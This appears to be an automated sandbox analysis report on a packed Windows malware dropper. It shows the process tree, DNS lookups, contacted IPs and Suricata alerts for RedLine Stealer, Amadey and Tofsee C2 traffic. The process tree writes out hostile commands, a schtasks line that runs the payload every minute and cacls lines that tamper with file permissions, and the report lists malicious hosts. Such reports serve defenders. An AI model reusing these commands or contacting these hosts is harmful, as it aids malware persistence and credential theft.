Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 6, 2023, 2:03 p.m.	Sept. 6, 2023, 2:05 p.m.

Size	7.4MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`e8e7a7c1a9b0aba35338c2de4d4bd0af`
SHA256	`9f35bb451e3794d1c641e8814946ca28f4cb9366dd826482e3f8e04a07518c8d`
CRC32	`3E69D2C4`
ssdeep	`196608:0FSs/w672AkrAwPXI7aZudOhR3tRUe8Ai6VRQQafRQ:0FSsDqAkTPXunMh1nUMi6VRQ`
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature VMProtect_Zero - VMProtect packed file IsPE64 - (no description)

WWW14_n.exe "C:\Users\test22\AppData\Local\Temp\WWW14_n.exe"
2548
- K0YrHneBJRok9kkcgxcVi1wX.exe "C:\Users\test22\Pictures\Minor Policy\K0YrHneBJRok9kkcgxcVi1wX.exe"
  1356
  - regsvr32.exe "C:\Windows\System32\regsvr32.exe" /s UGU3D.TH /u
    2776
- roxaidHeyogEYigLYEhLdXte.exe "C:\Users\test22\Pictures\Minor Policy\roxaidHeyogEYigLYEhLdXte.exe"
  2564
  - D445QVy6fBc8sYldcvsAOYlp.exe "C:\Users\test22\Pictures\Minor Policy\D445QVy6fBc8sYldcvsAOYlp.exe"
    2380
    - oneetx.exe "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe"
      1536
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
        1264
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
        2664
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2456
        
        cacls.exe CACLS "oneetx.exe" /P "test22:N"
        2176
        
        cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
        2876
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2872
        
        cacls.exe CACLS "..\207aa4515d" /P "test22:N"
        736
        
        cacls.exe CACLS "..\207aa4515d" /P "test22:R" /E
        2064
      - chrome.exe "C:\Users\test22\AppData\Local\Temp\1000307001\chrome.exe"
        1964
      - toolspub2.exe "C:\Users\test22\AppData\Local\Temp\1000308001\toolspub2.exe"
        1504
      - 31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\test22\AppData\Local\Temp\1000309001\31839b57a4f11171d6abc8bbc4451ee4.exe"
        2140
  - B4xOa2tIkWnlwQUw0ktE4tUz.exe "C:\Users\test22\Pictures\Minor Policy\B4xOa2tIkWnlwQUw0ktE4tUz.exe"
    2852
- VM_XuQhtwE4MZh2SBtXgFZit.exe "C:\Users\test22\Pictures\Minor Policy\VM_XuQhtwE4MZh2SBtXgFZit.exe"
  2520
  - vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    1140
- Fbvl4QloH4gG7tQ0zjEO4fTN.exe "C:\Users\test22\Pictures\Minor Policy\Fbvl4QloH4gG7tQ0zjEO4fTN.exe"
  2528
- mAOUez2DUv07HLYgPAj9J3lL.exe "C:\Users\test22\Pictures\Minor Policy\mAOUez2DUv07HLYgPAj9J3lL.exe"
  2500
  - Install.exe .\Install.exe
    1380
    - Install.exe .\Install.exe /rpdidWAf "525403" /S
      2912
- 6emCr1XoWbH0qII1NEhQIfRv.exe "C:\Users\test22\Pictures\Minor Policy\6emCr1XoWbH0qII1NEhQIfRv.exe"
  2544
- UGF12yv5bvCGEXJmBLvQOV8c.exe "C:\Users\test22\Pictures\Minor Policy\UGF12yv5bvCGEXJmBLvQOV8c.exe"
  2536
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
preconcert.pw	A 104.21.84.222 A 172.67.197.101	172.67.197.101
vk.com	A 87.240.129.133 A 87.240.132.72 A 87.240.132.67 A 87.240.137.164 A 93.186.225.194 A 87.240.132.78	93.186.225.194
iplis.ru	A 148.251.234.93	148.251.234.93
apps.identrust.com	A 23.67.53.27 A 23.67.53.17 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net	23.67.53.17
ironhost.io	A 104.21.57.237 A 172.67.193.129	172.67.193.129
sun6-20.userapi.com	A 95.142.206.0	95.142.206.0
ipinfo.io	A 34.117.59.81	34.117.59.81
www.maxmind.com	A 104.18.145.235 A 104.18.146.235	104.18.146.235
sergejbukotko.com	A 172.67.214.144 A 104.21.59.53	104.21.59.53
psv4.userapi.com	A 87.240.137.134 A 87.240.190.89 CNAME ps.userapi.com A 87.240.190.76 A 87.240.137.140	87.240.190.76
api.myip.com	A 172.67.75.163 A 104.26.9.59 A 104.26.8.59	104.26.8.59
red.mk	A 141.95.126.89	141.95.126.89
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.5.15
sun6-21.userapi.com	A 95.142.206.1	95.142.206.1
230809204625331.nes.dtf99.top	A 179.43.158.2	94.156.35.76
sun6-23.userapi.com	A 95.142.206.3	95.142.206.3
api.db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	172.67.75.166

IP Address	Status	Action
185.225.74.51	Active	Moloch
104.18.145.235	Active	Moloch
104.26.5.15	Active	Moloch
141.95.126.89	Active	Moloch
148.251.234.93	Active	Moloch
164.124.101.2	Active	Moloch
172.67.193.129	Active	Moloch
172.67.197.101	Active	Moloch
172.67.214.144	Active	Moloch
172.67.75.163	Active	Moloch
172.67.75.166	Active	Moloch
176.123.9.85	Active	Moloch
179.43.158.2	Active	Moloch
185.225.73.32	Active	Moloch
193.42.32.118	Active	Moloch
208.67.104.60	Active	Moloch
23.67.53.17	Active	Moloch
34.117.59.81	Active	Moloch
45.15.156.229	Active	Moloch
45.9.74.80	Active	Moloch
87.240.132.72	Active	Moloch
87.240.132.78	Active	Moloch
87.240.190.76	Active	Moloch
94.142.138.131	Active	Moloch
95.142.206.0	Active	Moloch
95.142.206.1	Active	Moloch
95.142.206.3	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49162 -> 193.42.32.118:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 172.67.75.163:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49168 -> 172.67.75.163:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49164 -> 172.67.193.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49178 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49169 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49172 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49172 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 172.67.214.144:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 172.67.214.144:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49173 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
UDP 192.168.56.101:52815 -> 164.124.101.2:53	2016778	ET DNS Query to a *.pw domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 172.67.214.144:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 94.142.138.131:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 172.67.214.144:80 -> 192.168.56.101:49179	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.132.72:80 -> 192.168.56.101:49190	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 172.67.214.144:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 172.67.214.144:80 -> 192.168.56.101:49180	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 172.67.197.101:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 172.67.197.101:80 -> 192.168.56.101:49183	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49191 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 172.67.197.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49193 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.95.126.89:443 -> 192.168.56.101:49193	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49193	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49215 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 172.67.197.101:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 172.67.197.101:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49184 -> 172.67.197.101:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 87.240.132.72:80 -> 192.168.56.101:49218	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49194 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49206 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49206 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49222 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49208 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 141.95.126.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.95.126.89:443 -> 192.168.56.101:49208	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49208	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49223 -> 95.142.206.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49211 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49213 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49210 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49216 -> 95.142.206.0:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49226 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49224 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 87.240.190.76:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49192 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49196 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49200 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49202 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49202 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 87.240.132.72:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 87.240.132.72:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 141.95.126.89:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.101:49212 -> 141.95.126.89:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49212	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49212	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49227 -> 87.240.190.76:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49229 -> 95.142.206.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49228 -> 87.240.132.72:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49248 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49248 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49248 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 148.251.234.93:443 -> 192.168.56.101:49251	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49253 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49242 -> 94.142.138.131:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49260 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49260 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49255 -> 176.123.9.85:16482	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49260 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49260 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49244 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49258 -> 104.18.145.235:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49243 -> 45.15.156.229:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 185.225.74.51:44767 -> 192.168.56.101:49256	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49254 -> 185.225.73.32:44973	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 185.225.73.32:44973	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.101:49254 -> 185.225.73.32:44973	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49254 -> 185.225.73.32:44973	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49263 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49263 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49255 -> 176.123.9.85:16482	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.101:49255 -> 176.123.9.85:16482	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49255 -> 176.123.9.85:16482	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 176.123.9.85:16482 -> 192.168.56.101:49255	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49264 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 185.225.74.51:44767 -> 192.168.56.101:49256	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 185.225.73.32:44973 -> 192.168.56.101:49254	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 185.225.73.32:44973 -> 192.168.56.101:49254	2046106	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Response)	A Network Trojan was detected
TCP 192.168.56.101:49262 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49262 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49256 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
UDP 192.168.56.101:53767 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49268 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49268 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49273 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49276 -> 95.142.206.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49272 -> 179.43.158.2:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.101:49272 -> 179.43.158.2:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 179.43.158.2:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2014819	ET INFO Packed Executable Download	Misc activity
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2014819	ET INFO Packed Executable Download	Misc activity
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2014819	ET INFO Packed Executable Download	Misc activity
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49284	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49249 -> 172.67.75.163:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49249 -> 172.67.75.163:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49266 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49269 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49271 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49271 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49270 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.101:49269	2014819	ET INFO Packed Executable Download	Misc activity
